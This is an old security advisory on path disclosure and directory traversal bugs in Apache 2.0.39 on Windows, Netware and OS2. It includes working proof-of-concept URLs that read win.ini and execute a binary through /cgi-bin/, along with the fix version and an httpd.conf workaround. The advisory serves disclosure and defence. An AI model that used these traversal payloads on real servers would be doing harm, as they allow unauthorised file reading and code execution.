|
|
|
|
| |
| The Apache server (non UNIX) has been found to contain two security vulnerabilities, one a directory traversal vulnerability, the second a path disclosure vulnerability. The first vulnerability allows an attacker to any file in file system and execute it using a prefix of a /cgi-bin/. The second vulnerability is a simple path disclosure bug, useful for obtaining more info about the server (important if the administrator hide some information). |
| |
Credit:
The information has been provided by Auriemma Luigi of PivX Solutions.
|
| |
Vulnerable systems:
* Apache web server version 2.0.39 and previous 2.0.x (Windows/Netware/OS2)
Immune systems:
* Apache web server (UNIX)
* Apache web server version 2.0.40 (Windows/Netware/OS2)
Path disclosure:
The vulnerability is not dangerous because it does not give remote access to the system or other data accesses but for an attacker it is useful in gathering detailed information about the server to launch other malicious attacks.
Example:
From the browser we must insert the following string:
http://127.0.0.1/error/HTTP_NOT_FOUND.html.var
Then the server will answer with this page:
|Not Acceptable
|
|An appropriate representation of the requested resource /error/HTTP_NOT_FOUND.html.var could not be found on this server.
|Available variants:
|
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language de
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language en
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language es
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language fr
As you can see, the server answer with the full path of the file we have requested. We can request all the files .var in the error folder and we will have the same result.
Additional information can be found on the Apache website.
Directory traversal:
The problem is in the filtering of bad characters sent by the user. In our case the backslash character ('\' == %5c) is not filtered out, allowing us to directories outside the normally bounding HTTP root directory.
This vulnerability is even more severe by the fact that by prefixing the directory with a /cgi-bin/ we can cause the execution of the file we are requesting.
Examples:
The following are two simple examples:
The following will view the file winnt\win.ini:
http://127.0.0.1/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
The following will execute the "wintty" utility found in the Apache2/bin folder:
http://127.0.0.1/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO
The above two examples "translated":
http://127.0.0.1/error/\..\..\..\..\winnt\win.ini
http://127.0.0.1/cgi-bin/\..\bin\wintty.exe?-t+HELLO
Fix:
Apache 2.0.40 from Apache website: http://httpd.apache.org
Workaround:
However, this is a simple workaround suggested by the Apache Group for the directory traversal bug:
A simple one-line workaround in the httpd.conf file will disallow the vulnerability. Prior to the first 'Alias' or 'Redirect' directive, add the following directive to the global server configuration:
RedirectMatch 400 "\\\.\."
|
|
|
|
|
